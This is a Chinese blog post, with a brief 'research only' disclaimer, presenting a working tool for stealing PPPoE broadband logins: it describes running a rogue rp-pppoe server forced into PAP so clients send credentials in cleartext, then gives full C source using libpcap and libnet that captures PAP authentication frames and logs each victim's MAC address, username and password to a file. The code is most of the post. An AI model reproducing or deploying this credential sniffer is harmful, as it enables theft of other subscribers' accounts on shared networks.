权责声名:
本软件仅供研究学习之用,无意对网通或者电信及认证机制做任何抵触性行为。
本软件不可用于任何商业和不良用途,否则责任自负。
这两天闲来无事,写了一个程序来抓取用户名和密码。本来是打算是采用libnet和libpcap来构建PPPOE的server的,但是写到发送
PADS数据包后,client竟然没有响应,不知道是怎么回事,只好利用一个现成的PPPOE的server—–rp-pppoe。
安装rp-pppoe后,指定使用PAP模式进行认证这样的话,用户名和密码就是明文传送的了。
- #include
- #include
- #include
- #include
-
- #define NAME_LEN 25
- #define PASSWD_LEN 25
- #define PACKET_LEN 64
- #define FILTER_STR "ether[12:2]=0x8864 and ether dst %02x:%02x:%02x:%02x:%02x:%02x"
-
- static char *nic=NULL;//网卡
- unsigned char localMAC[6];
-
- void analysis(char *argument,const struct pcap_pkthdr* packet_header,const u_char* packet_content);
- void printpacket(const u_char* packet);
- void sig_intr(int signo);
-
- int main()
- {
- pcap_t *pcap_handle = NULL;
- int p_fd;
- char error_content[PCAP_ERRBUF_SIZE];
- struct bpf_program filter_code;
- char filter_buffer[256];
- bpf_u_int32 net_mask;
- bpf_u_int32 net_ip;
-
- /*For LibNet*/
- libnet_t *l=NULL;
- char l_errbuf[LIBNET_ERRBUF_SIZE];
- struct libnet_ether_addr *l_ether_addr;
-
- if ((l=libnet_init(LIBNET_LINK, nic,l_errbuf))==NULL)
- {
- fprintf(stderr,"libnet_init() error!\n");
- return 1;
- }
-
- //Get the Local Mac Address
- if ((l_ether_addr=libnet_get_hwaddr(l))==NULL)
- {
- fprintf(stderr,"unable to get local mac address :%s\n",libnet_geterror(l));
- goto err;
- }
- memcpy(localMAC,l_ether_addr,sizeof(localMAC));
-
- libnet_destroy(l);
-
- nic = pcap_lookupdev(error_content);
- if ((pcap_handle = pcap_open_live(nic,BUFSIZ,1,0,error_content))==NULL) //Get the libpcap handle
- {
- fprintf(stderr,"pcap_open_live: %s\n",error_content);
- goto err;
- }
-
-
- pcap_lookupnet(nic,&net_ip,&net_mask,error_content);
- p_fd=pcap_fileno(pcap_handle); //We will close it in child process
-
-
snprintf(filter_buffer,sizeof(filter_buffer),FILTER_STR,localMAC[0],localMAC[1],localMAC[2],localMAC[3],localMAC[4],localMAC[5]);
-
- //Filter String
- printf("Filter: %s\n",filter_buffer);
-
- pcap_compile(pcap_handle,&filter_code,filter_buffer,0,net_ip);
- pcap_setfilter(pcap_handle,&filter_code);
- pcap_freecode(&filter_code);
-
- signal(SIGINT,sig_intr);
-
- pcap_loop(pcap_handle,-1,analysis,NULL);
-
- //done:
- // pcap_close(pcap_handle);
- return 0;
- err:
- pcap_close(pcap_handle);
- return 1;
- }
-
- void analysis(char *argument,const struct pcap_pkthdr* packet_header,const u_char* packet)
- {
- FILE *log;
- int namelen = 0;
- int passwdlen;
- char name[NAME_LEN] = {0};
- char passwd[PASSWD_LEN] = {0};
- unsigned char SrcMAC[6];
-
- if( (packet[0x14]==0xc0) && (packet[0x15] == 0x23) && (packet[0x16] == 0x01) )
- {
- memcpy(SrcMAC,packet+6,6);
- namelen = packet[0x1A];
- memcpy(name,packet+0x1B,namelen);
- name[namelen] = '\0';
- passwdlen = packet[0x1B+namelen];
- memcpy(passwd,packet+0x1B+namelen+1,passwdlen);
- passwd[passwdlen] = '\0';
-
- // Test Infomations
- /*
- printf("#### Packet Info ####\n");
- printpacket(packet);
- printf("namelen = %d\n",namelen);
- printf("passwdlen = %d\n",passwdlen);
- printf("SrcMAC: %02x:%02x:%02x:%02x:%02x:%02x\n",SrcMAC[0],SrcMAC[1],SrcMAC[2],SrcMAC[3],SrcMAC[4],SrcMAC[5]);
-
- printf("#### Name and Password ####\n");
- printf("Name: %s\n",name);
- printf("Passwd: %s\n",passwd);
- */
-
- log = fopen("passwd.txt","a+");
- if(log == NULL)
- fprintf(stderr,"Open File Error!\n");
-
-
fprintf(stdout,"%02x:%02x:%02x:%02x:%02x:%02x\t%s\t%s\n",SrcMAC[0],SrcMAC[1],SrcMAC[2],SrcMAC[3],SrcMAC[4],SrcMAC[5],name,passwd);
-
fprintf(log,"%02x:%02x:%02x:%02x:%02x:%02x\t%s\t%s\n",SrcMAC[0],SrcMAC[1],SrcMAC[2],SrcMAC[3],SrcMAC[4],SrcMAC[5],name,passwd);
- fflush(log);
- }
- }
-
- void printpacket(const u_char* packet)
- {
- int i,j;
- printf("Recieve Packet is: \n");
- for(i = 0;i < PACKET_LEN/16;i++)
- {
- for(j = 0;j<16;j++)
- printf("%02x ",packet[16*i+j]);
- printf("\n");
- }
- }
-
- void sig_intr(int signo)
- {
- _exit(0);
- // goto done;
- }
阅读(7672) | 评论(12) | 转发(0) |